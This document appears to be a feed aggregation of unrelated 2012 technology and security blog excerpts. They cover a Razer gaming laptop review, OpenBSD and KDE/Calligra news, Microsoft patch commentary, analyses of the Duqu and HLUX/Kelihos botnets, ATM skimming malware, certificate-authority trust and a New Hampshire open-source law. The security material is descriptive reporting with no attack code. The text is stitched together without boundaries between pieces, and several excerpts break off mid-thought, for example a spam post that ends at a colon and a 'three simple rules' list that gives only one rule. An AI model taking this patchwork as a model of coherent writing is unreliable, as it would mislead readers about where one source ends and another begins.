Razer is, first and foremost, a gaming company. From the company slogan (“By gamers, for gamers”), to partnerships with a number of the most popular game development studios, even the job title on the CEO’s business card (it reads Chief Gamer), nothing about Razer is shy about who the target market is. But it’s key to note that Razer is a gaming company which has focused on gaming-related peripherals and accessories—mice, keyboards, headsets, controllers, and limited edition peripherals for specific games. But that all changes as of now.
The vessel of change in question: Razer’s new Blade, a 17” gaming laptop that bucks almost all of the common trends in gaming-focused desktop replacements. Heralded by Razer as the “World’s First True Gaming Laptop”, the Blade packs a 2.8GHz Core i7-2640M, NVIDIA’s GT 555M dGPU, 8GB of memory, a 256GB SSD, and a 17.3” 1080p display into an enclosure that’s just 0.88” thick and weighs 6.4lbs. If Intel were to extend the ultrabook hardware guidelines out to 17” notebooks, the Blade would hit them pretty dead on. It’s pretty clear right off the bat that Razer wasn’t aiming at the gargantuan six-core SLI notebooks out there—in fact, on paper the Blade looks a bit like the Windows answer to the 17” MacBook Pro.
This isn’t the first time that Razer has shown intent to play in the gaming hardware space, having shown off the impressive Switchblade concept system at CES 2011. The Switchblade design concept clearly had a major influence on the Blade as is evident from the Switchblade UI panel on the side of the keyboard, but what’s important to note with the Blade is that it shows just how serious Razer is about transitioning into PC hardware and gaming systems. Read on to see how it fared.
Boutique gaming desktops are nothing new around here; while enthusiasts may readily dismiss them, it's easy to forget they do serve a purpose and a market beyond the do-it-yourself crowd. There are certain things even a lot of enthusiasts, myself included, aren't able to do that boutiques can; specifically, assembling custom liquid cooling loops. The last one of these we saw was Puget Systems' Deluge, a behemoth of a machine that retailed for more than seven grand.
Today iBUYPOWER is making available a system with many of those same perks at a fraction of the cost. The Erebus GT uses an entirely custom enclosure, has a laser-etched panel window with white LED lighting, and most importantly includes a custom liquid loop attached to a massive top-mounted radiator that cools the CPU and GPU. Can iBUYPOWER deliver a truly compelling boutique build at a reasonable price without cutting any corners? Let's find out.
Date: Tue, 13 Mar 2012 20:47:24 From: Theo de RaadtTo: announce@cvs.openbsd.org Subject: pre-orders activate for OpenBSD 5.1 It is that time again. I have just activated pre-orders for CDs, tshirts, and posters for the 5.1 release -- due May 1. http://openbsd.org/orders.html At the same time, I am making available the song that will come out with the release (hmm, it is still moving out to the ftp mirrors at the moment, but that is ok). The song and details of it are linked from: http://openbsd.org/lyrics.html
And this time there's even more goodies available for you to grab for your collection.
Read more...
Patch Tuesday March 2012 fixes a set of vulnerabilities in Microsoft technologies. Interesting fixes rolled out will patch a particularly problematic pre-authentication ring0 use-after-free in Remote Desktop and a DoS flaw, a DoS flaw in Microsoft DNS Server, and several less critical local EoP vulnerabilities.
It seems to me that every time a small and medium sized organization runs a network, the employees or members expect remote access. In turn, this Remote Desktop service is frequently exposed to public networks with lazy, no-VPN or restricted communications at these sized organizations. RDP best practices should be followed requiring strong authentication credentials and compartmentalized, restricted network access.
Some enterprises and other large organizations continue to maintain a "walled castle" and leave RDP accessible for support. The problem is that RDP-enabled mobile laptops and devices will make their way to coffee shops or other public wifi networks, where a user may configure a weak connection policy, exposing the laptop to attack risk. Once infected, they bring back the laptop within the walled castle and infect large volumes of other connected systems from within. To help enterprises that may have patch rollout delays, Microsoft is providing a fix-it that adds network layer authentication to the connection, protecting against exploit of the vulnerability.
This past fall, we observed the RDP worm Morto attacking publicly exposed Remote Desktop services across businesses of all sizes with brute force password guessing. It was spreading mainly because of extremely weak and poor password selection for administrative accounts! The Morto worm incident brought attention to poorly secured RDP services. Accordingly, this Remote Desktop vulnerability must be patched immediately. The fact that it's a ring0 use-after-free may complicate the matter, but Microsoft's team is rating its severity a "1" - most likely these characteristics will not delay the development of malicious code for this one. Do not delay patch rollout for CVE-2012-0002.
Finally, for less technical readers, allow me to explain a little about what a "Remote Desktop pre-auth ring0 use-after-free RCE" really is. Remote Desktop is a remotely accessible service that enables folks to connect remotely to a Windows system and open a window to the desktop in an application as though you were sitting in front of the computer. Usually, you need to log in to the system to do that, so the system is fairly protected. Unfortunately, this bug is such that a remote attacker that can connect to the system's Remote Desktop service over the network can successfully attack the system without logging in. The "ring0" piece simply means that the vulnerable code exists deeply in the Windows system internals, or the kernel, of the operating system (most applications running on a system run in "ring3", or "user-mode"). "Use-after-free" is the type of vulnerability enabling the exploit, and this type of flaw is something that continues to be extremely difficult to weed out as predicted years ago, even as many of the more traditional low hanging stack and heap overflows have been stomped out by automated code reviews and better coding practices. And finally, RCE applies to the type of exploit enabled by the vulnerability, or "remote code execution", meaning an attacker can deliver malicious code of their choosing to the system and steal everything. There you go, "pre-auth ring0 use-after-free RCE".
Today is the last day of CanSecWest - a security conference taking place in Vancouver, Canada. On Wednesday I filled in for Costin Raiu and talked about our forensics work into Duqu's C&C servers.
As I'm writing this, Google Chrome just got popped. Again. The general feeling is that $60k, even with a sandbox escape, isn't a whole lot of money for a Chrome zero-day. So, to see multiple zero-days against Chrome is quite the surprise, especially when considering the browser's Pwn2Own track record.
Separately, I found the Q&A session following Facebook's Alex Rice’s presentation immensely intriguing.
"CeBIT is big. Really big. You just won't believe how vastly, hugely, mind-bogglingly big it is. I mean, you may think it's a long way down the road to the chemist's, but that's just peanuts to CeBIT."
I popped along to CeBIT for a day to browse the world's biggest technology show and say hi to the lovely KDE people who were running a stand there.
Ingwa was there in his smartest suit to look all professional. Friedrich and eckhart kept the punters enthused about KDE all day. Claudia and me met with a potential new Akademy sponsor. And Aaron turned up with his fabled Spark.
KDE's stall was in building 2 of 26.
KDE's finest demonstrating the world's finest consumer software to suits
The Ubuntu stand is organised by Ubuntu-DE (many of whom use KDE)
Ingwa acts as booth babe to the Spark Tablet
Amazing what you find at CeBIT, Xompu is a German company who make simplified UIs with Plasma, awesome. This article says it runs Kubuntu. Awesomer.
After the show the large stalls all out-compete each other to have the coolest after party. You could easily become an alcoholic by staying there all week, I got free lager and weiner from some a regional government of germany, free posh beer from some company or other and free cocktails from Citrix I think it was although nobody wanted to talk to me about Citrix. And I can't even drink much more than a sip of alcohol.
While analyzing the components of Duqu, we discovered an interesting anomaly in the main component that is responsible for its business logics, the Payload DLL. We would like to share our findings and ask for help identifying the code.
At first glance, the Payload DLL looks like a regular Windows PE DLL file compiled with Microsoft Visual Studio 2008 (linker version 9.0). The entry point code is absolutely standard, and there is one function exported by ordinal number 1 that also looks like MSVC++. This function is called from the PNF DLL and it is actually the “main” function that implements all the logics of contacting C&C servers, receiving additional payload modules and executing them. The most interesting is how this logic was programmed and what tools were used.
The code section of the Payload DLL is common for a binary that was made from several pieces of code. It consists of “slices” of code that may have been initially compiled in separate object files before they were linked in a single DLL. Most of them can be found in any C++ program, like the Standard Template Library (STL) functions, run-time library functions and user-written code, except the biggest slice that contains most of C&C interaction code.
Layout of the code section of the Payload DLL file
This slice is different from others, because it was not compiled from C++ sources. It contains no references to any standard or user-written C++ functions, but is definitely object-oriented. We call it the Duqu Framework.
As Eugene Kaspersky had written earlier, we were expecting new DDoS attacks on resources covering the Russian presidential election. So, as the country went to the polls on 4 March, we were on the lookout for new DDoS attacks.
We were surprised to hear a news report from one mass media source that claimed a series of attacks from foreign countries had targeted the servers responsible for broadcasting from polling stations. The announcement came at about 21:00, but there was no trace of any attack on our monitoring system. The media report did not clarify exactly what sort of attacks had been staged. Instead of a DDoS attack, the journalists might have been referring to a different method of seizing unauthorized access, such as an SQL injection.
The internet is full of infected hosts. Let's just make a conservative guesstimate that there are more than 40 million infected victim hosts and malware serving "hosts" connected to the internet at any one time, including both traditional computing devices, network devices and smartphones. That's a lot of resources churning out cybercrime, viruses, worms, exploits, spyware. There have been many suggestions about how to go about cleaning up the mess, the challenges are complex, and current cleanups taking longer than expected.
Mass exploitation continues to be an ongoing effort for cybercriminals and a major problem - it's partly a numbers game for them. Although exploiting and infecting millions of machines may attract LE attention at some point, it's a risk some are willing to take in pursuit of millions of dollars that could probably be better made elsewhere with the same effort. So take, for example, the current DNSChanger cleanup. Here is a traditional profit motivated 4 million PC and Mac node malware case worked by the Fbi, finishing with a successful set of arrests and server takedown.
EuroBSDcon is the European technical conference for users and developers on BSD-based systems. The EuroBSDcon 2012 conference will be held in Warsaw, Poland from Thursday 18 October 2012 to Sunday 21 October 2012, with tutorials on Thursday and Friday and talks on Saturday and Sunday.
Read more...
This week I've been on Ubuntu release driver duty for Beta 1. Ubuntu has lots of flavours there days and they all need to be nudged to ensure they get their testing and announcements done in time. We only had a few hiccups, some of the flavours had to be respun late last night for fixes and do lots of testing today. Ubuntu (poor under-resourced flavour that it is) also didn't update their upgrade instructions in good time and some grumping at them was needed (sorry, I get grumpy quickly these days with my traumatised brain). Slashdot linked to the wrong URL for downloading Ubuntu CDs so I had to put in a quick redirect to point them at the announcement where the correct URLs are.
Here is the Kubuntu Beta 1 announcement showing nice features like Telepathy-KDE and a big OwnCloud update.
And for anyone worried about the future of Kubuntu, Kubuntu 12.04 to be Supported for 5 Years reaffirms that we will be treating 12.04 like any other LTS, only 2 years longer. It also affirms that we will be continuing Kubuntu in the same way I have run it for the last 7 years, as a successful community made Ubuntu flavour.
Dear All,I am glad to inform you that we are again organizing a "DanuBSDCon" (aka. BSD-Day). It is going to be held at the UAS Technikum Wien in Vienna, Austria on Saturday May 5, 2012 as part of the Austrian Linuxweeks (Linuxwochen).
We would like to invite everybody — anybody who is just looking for an excuse to make a short trip to Central Europe, spend a nice weekend in Vienna, join us for a beer, talk about her favourite topic, or meet fellow developers from the region (and from other BSD flavours), or accidentally will not be able to make it to Canada :-)
So, please contact me if you are interested!
As C.Boemann already said, we met at my place for two days in order to fix some serious issues we had with the undo/redo framework in Calligra Words (and Stage for that matter).
The undo/redo framework is something I wrote when I first started contributing to KOffice about 3 years ago. I have to say that I was not really looking forward having to jump into this stuff again. I am not such a masochist and the memories I have of writing this are not ones of an easy glide.
It actually turned out to be really fun and gratifying. There were some headaches involved to be sure but overall I really enjoyed it.
To summarise a bit (more detailed description bellow for the hard hearted): we use Qt Scribe framework for our document. When an edition is done on a QTextDocument, it emits a signal telling that an undo/redo action was added on the QTextDocument internal undoStack. The application listens to this signal and can create an undo action on its stack to match QTextDocument's internal one.
The initial framework I created basically followed that behaviour. There was one thing that it was never meant to handle: nested commands. This means that when nesting commands, like for example the delete command now contains a deleteInlineObject command, the framework would create 2 commands on the application's stack.
So we sat with Boemann thinking how to solve that problem. In the end we only needed to add, instead of a single head command member in the framework, a stack of head commands.
Now we have a framework which is way more complete and solid, plus it is now documented in the code.
There are some improvements we could already think of to make the API a bit more flexible, but we can be confident now that we have solid foundations for the upcoming Calligra Words releases.
Overall, I had a really good time coding with C.Boemann, who is not only a very talented coder but also somebody I really appreciate. It is amazing to see what we achieved in those just two days.
A bit more details:
As I said, we use QTextDocuments to hold the data of one text frame (text shapes). This document is edited through a specific handler: a KoTextEditor. This editor is not only responsible for editing the QTextDocument but also to listen to the QTextDocument's undoCommandAdded signal and keep our application's stack in sync.
There are 3 use cases of our undo/redo framework:
- editing done within the KoTextEditor
- complete commands pushed on the KoTextEditor by an external tool
- on-the-fly macro commands
In addition to this, there are two special cases in editing QTextDocument: inserting text and deleting text. These two actions only trigger a signal on the first edit. Any subsequent compatible edit is "merged" into the original edit command and will not trigger a signal. Inserting text and deleting are therefore open ended actions, as far as our framework is concerned.
In order to handle this, a sort of state machine is used. The KoTextEditor can be in a NoOp, KeyPress, Delete, Format or Custom state. Furthermore, for each signal received from the QTextDocument, we create a "dummy" UndoTextCommand, whose sole purpose is to call QTextDocument::undo or QTextDocument::redo. These commands need to be parented to a command which we push on our application's stack. This head command will call undo or redo on all its children when the user press undo or redo in the application.
In order to allow for nested head commands, we maintain a stack. Its top-most command will be the parent of the signal induced UndoTextCommands.
Depending on the KoTextEditor state and commandStack, new head commands are pushed on the commandStack, or the current top command is popped.
I will not enter into more details here, if you are interested in the whole gory logic of this, you can look at the code in calligra/libs/kotext/KoTextEditor_undo.cpp (which for now lies in the text_undo_munichsprint git branch). The code has now been pretty well documented, something I had not done before.
That's it for today. Once again, I ask from as much of you to try our next test release, specifically the undo/redo framework, so that we can ensure that we release a really good stable Calligra Words.
It’s that time of year again, time to fill out your taxes and pay your part. We’ve seen more than a few examples of Tax and IRS related spam. Yesterday I received mail with an interesting approach:
I'm at PierreSt's house in Munich for a minisprint trying to fix the undo system in Calligra Words. I arrived Sunday evening, and we started immediately discussing how we would solve the issues we are facing. Luckily we seem to have the same idea and understanding of the issues.
Today, Monday, we have started hacking. But let me explain a bit about the problems we are having:
Words is using QTextDocument for storage of the actual characters, but we embellish this with all sorts of homegrown stuff, for inline images, change tracking etc. QTextDocument has it's own undo stack but since Words can do those other things too we need to combine that with undoCommands of our own.
It's when we need to make macro commands that combine our commands with those of QTextDocument that we run into trouble. Partly because the framework wasn't taking subcommanding into consideration, and partly because no one realy understood what went on so we used the framework wrongly. We are now correcting both of these issues.
If all goes well we might create a Release Candidate of Calligra in 2 weeks or so.
The Calligra Suite recently released the 7th beta, and mostly because Calligra Words is still not ready. Building a new application from scratch takes time.
Until around October the focus was on writing a new text layout system that could provide the rich text support that any user demands these days. We were not able to reuse the code from KOffice as it was simply not up to the job. So this took a lot of effort.
And then just as we thought we only had to do final touches before we could release we found out that the styles subsystem we (myself included) had created in the KOffice days had huge deficiencies as well. Basically the user would lose data related to the style hierarchy. It was a complete mess and took 2 months to sort out.
At around the same time we found that the lists handling were a complete mess as well (again partly to blame myself, but we learn as we go). So we had to sort that out too, which took about the same two months
Then in December we again tried to do some of the final touches to get the release ready. This time focusing on undo/redo of shapes, and how the shapes are anchored to text. That turned out to take a couple of weeks.
In January we looked at undo/redo for normal text editing and to our horror it turned out to be another can of worms, which we havn't solved yet. It's related to the purpose of how the code has gradually changed. We now need to rethink the structure of it. On February 19th I'll fly to Munich for a 4 day mini sprint, graciously sponsored by KDE e.v. to sort this out. At least we have a plan for how we will solve it.
When I get back home we'll probably tag an 8th beta.
But during all this fixing we have also implemented a lot of new features. Table of contents, editable footnotes, bibliography, new statistics docker, a great styles combobox, a novel new approach to the ui in general.
So all in all we have had great progress while also making sure most things work. Obviously we have not solved every little bug, as no application is ever bug free. But at some point we do need to release and that point is coming closer and closer. So stay tuned.
Pretty often I hear people say that Calligra Words is a fork of KWord. As a maintainer I tell you this not true. Sure we have ripped about 20% of the code from KWord but even that has been dismantled and reassemble in a new way.
That doesn't constitute a fork. Calligra Words is effectively a new word processor. We have more in common with Stage than we do with KWord. We even started the development of Words by disabling what was KWord, and then we built Words by slowly adding functionality .
KDEPIM Git Resource
You can now monitor any git repository with KMail. Commits will appear as e-mails in the message list.
It will do a git fetch every 5 minutes or so.
This is still a playground project, so it has some limitations:
- Only master is supported yet
- If authentication is needed for the git-fetch, you must run ssh-add
in the same terminal where you're going to start akonadi. ( ssh-add && akonadictl restart )
While not needing to depend on commitfilter.kde.org or other external notification services is great, this wasn't my primary reason for creating this resource.
I did it because we can, or rather "since KDEPIM>4.4 we can".
Thanks to the new KDEPIM architecture, the application is now really decoupled from the data and that opens us a world of possibilities.
The git resource took me only 8 hours of coding, without needing to touch a single line of KMail code, therefore not introducing any regressions.
The barrier to contribute new features to kontact has never been so low.
--
git clone git://anongit.kde.org/akonadi-git-resource
This is not the first time the HLUX botnet has been mentioned in this blog, but there are still some unanswered questions that we’ve been receiving from the media: What is the botnet’s sphere of activity? What sort of commands does it receive from malicious users? How does the bot spread? How many infected computers are there in the botnet?
Before answering the questions it’s important to clarify that the HLUX botnet we previously disabled is still under control and the infected machines are not receiving commands from the C&C, so they’re not sending spam. Together with Microsoft’s Digital Crimes Unit, SurfNET and Kyrus Tech, Inc., Kaspersky Lab executed a sinkhole operation, which disabled the botnet and its backup infrastructure from the C&C.
The answers below refer to a new version of the HLUX botnet - it’s a different botnet but the malware being used is build using the same HLUX coding. Analysis of a new bot version for the HLUX botnet (md5: 010AC0BFF69EB945108B57B40A4784BE, size: 882176 B) revealed the following information.
As we already known, the bot distributes spam and has the ability to conduct DDoS attacks. In addition, we have discovered that:
Part of the HLUX code that interacts with FTP clients
Part of the HLUX code used to steal Bitcoin wallets
The bot is loaded onto users’ computers from numerous sites hosted on fast flux domains primarily in the .EU domain zone. The bot installs small downloaders (~47 KB) on the system. These downloaders have been detected on computers in the GBOT and Virut botnets. The downloaders can be loaded to computers within minutes of a machine being infected by the malware mentioned above (GBOT and Virut). This distribution method hinders the detection of the primary bot distribution source.
Bot installations have also been detected during drive-by attacks that make use of the Incognito exploit kit.
The number of computers in the new HLUX botnet is estimated to be tens of thousands, based on the numbers in the approximately 8000 IP addresses detected in operations conducted via P2P.
As before, the HLUX botnet primarily receives commands to distribute spam. However, another malicious program, which we wrote about here, is also being installed on the botnet. Its main functionality is fraudulent manipulation of search engines along the lines of TDSS.
The passwords harvested from FTP are used to place malicious Javascripts on websites that redirect users of the compromised sites once again to Incognito exploit kit. Exploits for the CVE-2011-3544 vulnerability are primarily used when the bot is installed during these attacks. In other words, HLUX implements a cyclical distribution scheme just like that used by Bredolab.
The HLUX botnet, both old and new, is a classic example of organized crime in action on the Internet. The owners of this botnet take part in just about every type of online scam going: sending spam, theft of passwords, manipulation of search engines, DDoS etc.
It is not uncommon for new versions of botnets to appear, and it’s one of the challenges we face in the IT security industry. We can neutralize botnet attacks and delay cyber criminal activities but ultimately the only way to take botnets down is to arrest and persecute the creators and groups operating them. This is a difficult task because security companies face different federal policies and legislation in various countries where botnets are located. This causes the law enforcement investigations and legal process to be a long and arduous process.
We’ll continue monitoring this particular botnet and keep you up to speed with any technical developments.
P.S. We noticed this on one fast flux domain that was earlier spreading HLUX:
It’s not yet clear whether this is the control panel of the HLUX botnet.
Microsoft is releasing 9 Security Bulletins this month (MS12-008 through MS12-016), patching a total 21 vulnerabilities. Some of these vulnerabilities may enable remote code execution (RCE) in limited circumstances, and offensive security researchers have claimed that a "bug" fixed this month should be client-side remote exploitable, but after months of public circulation, there have been no known working exploits.
The prioritized vulnerabilities patched this month exist in Internet Explorer, a specific version of the C runtime, and .NET framework. The Internet Explorer and .NET framework vulnerabilities may result in a potential drive-by exploits, so consumers and businesses alike should immediately install these patches - mass exploitation is likely to be delivered via COTS exploit packs like Blackhole and its ilk.
Debian developer James Bromberger recently posted the interesting ”Debian Wheezy: US$19 Billion. Your price… FREE!”, where he explains why the newest Debian distribution (“Wheezy”) would have taken $19 billion U.S. dollars to develop if it had been developed as proprietary software. This post was picked up in the news article ”Perth coder finds new Debian ‘worth’ $18 billion” (by Liam Tung, IT News, February 14, 2012).
You can view this as an update of my More than a Gigabuck: Estimating GNU/Linux’s Size, since it uses my approach and even uses my tool sloccount. Anyone who says “open source software can’t scale to large systems” clearly isn’t paying attention.
Last week researchers found vulnerabilities in the Google Wallet payment system. The first vulnerability was found by Zvelo, which required root access. Rooting devices has become just short of trivial at this point with the availability of “one-click root” applications for most platforms. The vulnerability was leveraged to display the current PIN number. The very next day a new vulnerability was discovered in how application data is handled in the Wallet app. In this case no root access is needed, as thesmartphonechamp demonstrated , this is simply a flaw in how the application works. Assuming a Google Prepaid card has been set up, a user can navigate to the application management interface, and delete application data for Google Wallet. On return to the app’s interface, the user is then prompted to set up a new PIN. The flaw is that the Google Prepaid card data persists. After establishing a new PIN number, the attacker is free to use the prepaid card as though it was their own.
It may not be in the same league as Christmas and New Year, but with every year Valentine’s Day is being exploited more and more by spammers. In the week before it is celebrated this year Valentine’s spam accounted for 0.3% of all spam.
We registered the first Valentine’s spam as far back as 14 January - a whole month before the holiday itself - and it struck us as being rather unusual.
Like the majority of spam mass mailings exploiting the Valentine’s Day theme, this particular mailing was in English. It is a well-known fact that the lion’s share of English-language spam is distributed via partner programs. (Unlike other parts of the world, the practice of small and medium-sized companies ordering spam mailings or sending out spam themselves is not very popular in the USA and most western European countries.) However, the first Valentine’s spam of the year bucked this trend and had nothing to do with a partner program.
This particular offer for Valentine’s Day gifts made use of coupon services.
As you can see from the screenshot, the recipient is urged to buy a small gift for their loved one making use of a discount, an offer which the company made via the major coupon service Groupon.
Coupon services have proved to be a big success around the world. Every day various websites offer special deals on anything from two to several dozen goods or services.
Groupon is one of the biggest Internet projects of its kind and it’s fairly easy to find its promo campaigns online. The site also informs its subscribers about new deals via email. The company that sent out the first Valentine’s spam detected by Kaspersky Lab used an advert for this major portal, the legitimate Groupon email campaign plus spam advertising.
We’ve already noted that for small companies coupon services are fast becoming a credible alternative to spam advertising. Judge for yourself: the method used to spread adverts is the same - via email, but spam filters don’t block legitimate mailings from major Internet resources. Another important advantage is that the firms that offer coupon services are not breaking the law. The size of the mailing may well be less than a spam mailing that a company could order, but the legitimate mailing is sent out to the relevant region and the recipients are genuinely interested in special offers sent by coupon services. As a result, a targeted, legitimate mailing can be more effective than the typical ‘carpet bombing’ associated with traditional spam.
Coupon services have had a noticeable impact on mail traffic and Internet advertising. They have also affected spam. There are now a number of spam categories associated with coupon services.
The first is that of unsolicited mailings by the services themselves. This category of spam is quite rare - the more serious companies don’t want to tarnish their reputation by being associated with spam. However, some start-ups trying to break in to the market are willing to resort to spam in an attempt to attract subscribers or to allow their platforms to be used for promotions by other companies.
Another category of ‘coupon’ spam is that which simply uses the word “coupons” instead of “discounts” to make goods or services more attractive to users. These spam mailings can offer ‘coupons’ for some of the most unexpected items. For instance, the people behind pharmaceutical spam think nothing of offering a small discount on medications and passing it off as a coupon.
A third category of coupon spam includes things like the Valentine’s spam mentioned above. This involves a company whose offers are already available via a coupon service attempting to reach a wider audience by resorting to spam. As I see it, this approach is counterproductive. The majority of users react negatively to spam, and using it to advertise will only do harm to a company’s reputation. This is especially important as many coupon services rely on the trust of their users. Spam, therefore, can actually work against a coupon service, reducing the effect of a promotion instead of enhancing it.
The potential popularity of coupon services carries with it a specific threat. Users of the services tend to leave some money on their account balance so they can spend it at any time on a deal that takes their fancy. Although the amount of money stored on such accounts may not be very much, it is still likely to attract phishing attacks against the customers of coupon services.
So as not to play into the spammers’ hands, or to avoid falling victim to a phishing attack, when using these coupon services, users need to follow three simple rules:
Coupon services often send purchased coupons as an attachment in an email. If you have not purchased any coupons from the service, there’s a chance that an email attachment might be malicious. If you are not sure whether or not you bought the coupon, you can always check by entering your account. We have not yet detected a malicious attachment disguised as a coupon. Nevertheless, we recommend that users be careful - spammers that participate in partner programs are usually the first to react to new opportunities, including those that involve spreading malicious code. It’s just a matter of time before this type of spam traffic appears.
You’ve probably already heard about the 'Chupa Cabra', literally a "goat sucker". It’s a mythical beast rumored to inhabit parts of the Americas. In recent times it has been allegedly spotted in Puerto Rico (where it was first reported), Mexico and the United States, especially in the latter’s Latin American communities. The name Chupa Cabra has also been adopted by Brazilian carders to name skimmer devices, installed on ATMs. They use this name because the Chupa Cabra will “suck” the information from the victim’s credit card.
The Brazilian media regularly shows videos of bad guys installing their Chupa Cabra onto an ATM. Some of them are unlucky, or incompetent, and get picked up on security cameras and caught by the cops.
That’s what makes installing an ATM skimmer a risky business - and that’s why Brazilian carders have joined forces with local coders to develop an easier, more secure way to steal and clone credit card information. From this unholy alliance, the ‘Chupa Cabra’ malware was born.
A very important “internet trust” discussion is underway that has been hidden behind closed doors for years and in part, still is. While the Comodo , Diginotar, and Verisign Certificate Authority breaches forced discussion and action into the open, this time, this “dissolution of trust” discussion trigger seems to have been volunteered by Trustwave's policy clarification, and followup discussions on Mozilla's bugzilla tracking and mozilla.dev.security.policy .
The issue at hand is the willful issuance of subordinate CAs from trusted roots for 'managing encrypted traffic', used for MitM eavesdropping, or wiretapping, of SSL/TLS encrypted communications. In other words, individuals attempting to communicate over twitter, gmail, facebook, their banking website, and other sensitive sites with their browser may have their secure communications unknowingly sniffed - even their browser or applications are fooled. An active marketplace of hardware devices has been developed and built up around tapping these communications. In certain lawful situations, this may be argued as legitimate, as with certain known DLP solutions within corporations. But even then, there are other ways for corporate organizations to implement DLP. Why even have CA's if their trust is so easily co-opted? And the arbitrary issuance of these certificates without proper oversight or auditing in light of browser (and other software implemented in many servers and on desktops, like NSS ) vendor policies is at the heart of the matter. Should browser, OS and server software vendors continue to extend trust to these Certificate Authorities when the CA’s activities conflict with the software vendors’ CA policies?
Many of the apps we enjoy are free. Well, to call them free is a bit misleading. You pay for the apps by looking at advertisements. This is a platform we should all recognize from the sidebar of Facebook, or Google, or almost any service that doesn’t charge a premium to use it. Advertising has paved the way for many services to gather a huge audience audience and still profit.
On Android and in many cases iOS, the advertisers have gotten very aggressive. They now collect all kinds of data through multiple forms of advertising. I’d like to take a look now at what you can expect.
The Adobe AIR and Adobe Flash Player Incubator program updated their Flash Platform runtime beta program to version 5, delivered as Flash Player version 11.2.300.130. It includes a "sandboxed" version of the 32-bit Flash Player they are calling "Protected Mode for Mozilla Firefox on Windows 7 and Windows Vista systems". It has been over a year since Adobe discussed the Internet Explorer ActiveX Protected Mode version release on their ASSET blog, and the version running on Google Chrome was sandboxed too.
Adobe is building on the successes that they have seen in their Adobe Reader X software. Its sandbox technology has substantially raised the bar for driving up the costs of "offensive research", resulting in a dearth of Itw exploits on Reader X. As in "none" in 2011. This trend reflects 2011 targeted attack activity that we’ve observed. 2011 APT related attacks nailed outdated versions of Adobe Flash software delivered as "authplay.dll" in Adobe Reader v8.x and v9.x and the general Flash component "NPSWF32.dll" used by older versions of Microsoft Office and other applications. Adobe X just wasn't hit. IE Protected Mode wasn't hit. Chrome sandboxed Flash wasn't hit. If there are incident handlers out there that saw a different story, please let me know.
The U.S. state of New Hampshire just passed act HB418 (2012), which requires state agencies to consider open source software, promotes the use of open data formats, and requires the commissioner of information technology (IT) to develop an open government data policy. Slashdot has a posted discussion about it. This looks really great, and it looks like a bill that other states might want to emulate. My congrats go to Seth Cohn (the primary author) and the many others who made this happen. In this post I’ll walk through some of its key points on open source software, open standards for data formats, and open government data.
First, here’s what it says about open source software (OSS): “For all software acquisitions, each state agency… shall… Consider whether proprietary or open source software offers the most cost effective software solution for the agency, based on consideration of all associated acquisition, support, maintenance, and training costs…”. Notice that this law does not mandate that the state government must always use OSS. Instead, it simply requires government agencies to consider OSS. You’d think this would be useless, but you’d be wrong. Fairly considering OSS is still remarkably hard to do in many government agencies, so having a law or regulation clearly declare this is very valuable. Yes, closed-minded people can claim they “considered” OSS and paper over their biases, but laws like this make it easier for OSS to get a fair hearing. The law defines “open source software” (OSS) in a way consistent with its usual technical definition, indeed, this law’s definition looks a lot like the free software definition. That’s a good thing; the impact of laws and regulations is often controlled by their definitions, so having good definitions (like this one for OSS) is really important. Here’s the New Hampshire definition of OSS, which I think is a good one:
The material on open standards for data says, “The commissioner shall assist state agencies in the purchase or creation of data processing devices or systems that comply with open standards for the accessing, storing, or transferring of data…” The definition is interesting, too; it defines an “open standard” as a specification “for the encoding and transfer of computer data” that meets a long list of requirements, including that it is “Is free for all to implement and use in perpetuity, with no royalty or fee” and that it “Has no restrictions on the use of data stored in the format”. The list is actually much longer; it’s clear that the authors were trying to counter common vendor tricks who try to create “open” standards that really aren’t. I think it would have been great if they had adopted the more stringent Digistan definition of open standard, but this is still a great step forward.
Finally, it talks about open government data, e.g., it requires that “The commissioner shall develop a statewide information policy based on the following principles of open government data”. This may be one of the most important parts of the bill, because it establishes these as the open data principles:
The official motto of the U.S. state of New Hampshire is “Live Free or Die”. Looks like they truly do mean to live free.
In this webcast, Kaspersky Lab senior security researcher Roel Schouwenberg talks about the Diginotar certificate authority breach and the implications for trust on the Internet. Schouwenberg also provides a key suggestion for all major Web browser vendors.
It has been four months since Microsoft and Kaspersky Lab announced the disruption of Kelihos/Hlux botnet. The sinkholing method that was used has its advantages - it is possible to disable a botnet rather quickly without taking control over the infrastructure.However,as this particular case showed, it is not very effective if the botnet’s masters are still at large.
Not long after we disrupted Kehilos/Hlux, we came across new samples that seemed to be very similar to the initial version. After some investigation, we gathered all the differences between the two versions. This is a summary of our findings:
Let’s start with the lowest layer, the encryption and packing of Kelihos/Hlux messages in the communication protocol. For some reason, in the new version, the order of operations was changed. Here are the steps of processing an encrypted data for retrieving a job message which is organized as a tree structure:
№ | Old Hlux | New Hlux |
1 | Blowfish with key1 | Blowfish with new key1 |
2 | 3DES with key2 | Decompression with Zlib |
3 | Blowfish with key3 | 3DES with new key2 |
4 | Decompression with Zlib | Blowfish with new key3 |
S. Korean handlers are slow to take down the publicly distributed malicious code exploiting CVE-2012-0003, a vulnerability patched in Microsoft's January 2012 patch release MS12-004. We have discussed with reporters that the code has been available since the 21st, and a site appears to have been publicly attacking very low numbers of Korean users over the past day or so. The site remains up at this time.
This website (www.dwheeler.com) was down part of the day yesterday due to a mistake made by my web hosting company. Sorry about that. It’s back up, obviously.
For those who are curious what happened, here’s the scoop. My hosting provider (WebHostGiant) moved my site to a new improved computer. By itself, that’s great. That new computer has a different IP address (the old one was 207.55.250.19, the new one is 208.86.184.80). That’d be fine too, except they didn’t tell me that they were changing my site’s IP address, nor did they forward the old IP address. The mistake is that the web hosting company should have notified me of this change, ahead of time, but they failed to do so. As a result, I didn’t change my site’s DNS entries (which I control) to point to its new location; I didn’t even know that I should, or what the new values would be. My provider didn’t even warn me ahead of time that anything like this was going to happen… if they had, I could have at least changed the DNS timeouts so the changeover would have been quick.
Now to their credit, once I put in a trouble ticket (#350465), Alex Prokhorenko (of WebhostGIANT Support Services) responded promptly, and explained what happened so clearly that it was easy for me to fix things. I appreciate that they’re upgrading the server hardware, I understand that IP addresses sometimes much change, and I appreciate their low prices. In fact, I’ve been generally happy with them.
But if you’re a hosting provider, you need to tell the customer if some change you make will make your customer’s entire site unavailable without the customer taking some action! A simple email ahead-of-time would have eliminated the whole problem.
Grumble grumble.
I did post a rant against SOPA and PIPA the day before, but I’m quite confident that this outage was unrelated.
Anyway, I’m back up.
As some of you may remember, during 2011 we published a malware calendar wallpaper for each month of the year.
We're doing so again this year, with updated information from 2011. However, we've decided to take a slightly different approach this year and publish all 12 wallpapers in one place. You can find them all here.
